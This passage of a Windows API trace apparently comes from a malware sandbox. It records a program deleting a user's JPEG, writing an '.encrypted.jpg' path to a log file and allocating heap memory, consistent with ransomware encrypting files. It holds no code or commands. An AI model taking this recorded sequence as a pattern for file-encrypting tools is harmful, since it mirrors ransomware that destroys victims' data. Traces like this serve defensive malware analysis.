lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.400] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.401] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.401] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg", lpFilePart=0x0) returned 0x45 [0040.401] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4033360, ftCreationTime.dwHighDateTime=0x1d5b808, ftLastAccessTime.dwLowDateTime=0xfcd55950, ftLastAccessTime.dwHighDateTime=0x1d5c28f, ftLastWriteTime.dwLowDateTime=0x17ca2dc0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x17ce9, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="T4n1IOAv.jpg", cAlternateFileName="")) returned 0x7c2100 [0040.401] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\t4n1ioav.jpg")) returned 1 [0040.403] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4033360, ftCreationTime.dwHighDateTime=0x1d5b808, ftLastAccessTime.dwLowDateTime=0xfcd55950, ftLastAccessTime.dwHighDateTime=0x1d5c28f, ftLastWriteTime.dwLowDateTime=0x17ca2dc0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x17ce9, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="T4n1IOAv.jpg", cAlternateFileName="")) returned 0 [0040.403] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.403] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.403] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0040.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0040.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0040.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0040.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.403] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.403] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0040.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.404] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.404] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.404] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.404] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.404] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0040.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.404] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0040.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0040.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.404] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0040.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0040.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.405] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.405] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.405] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.405] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0040.405] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.405] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.405] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0040.405] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2da6, lpOverlapped=0x0) returned 1 [0040.405] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0040.405] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2da6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.406] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.encrypted.jpg\r\n", cchWideChar=82, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 82 [0040.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x52) returned 0x794b90 [0040.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.encrypted.jpg\r\n", cchWideChar=82, lpMultiByteStr=0x794b90, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.encrypted.jpg\r\n", lpUsedDefaultChar=0x0) returned 82 [0040.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0040.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0040.406] WriteFile (in: hFile=0x140, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x51, lpOverlapped=0x0) returned 1 [0040.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0040.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.406] CloseHandle (hObject=0x140) returned 1 [0040.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0040.411] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0040.411] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.412] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0040.412] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.412] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0040.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0040.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.412] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4c8 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0040.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889628 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0040.413] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0040.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0040.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 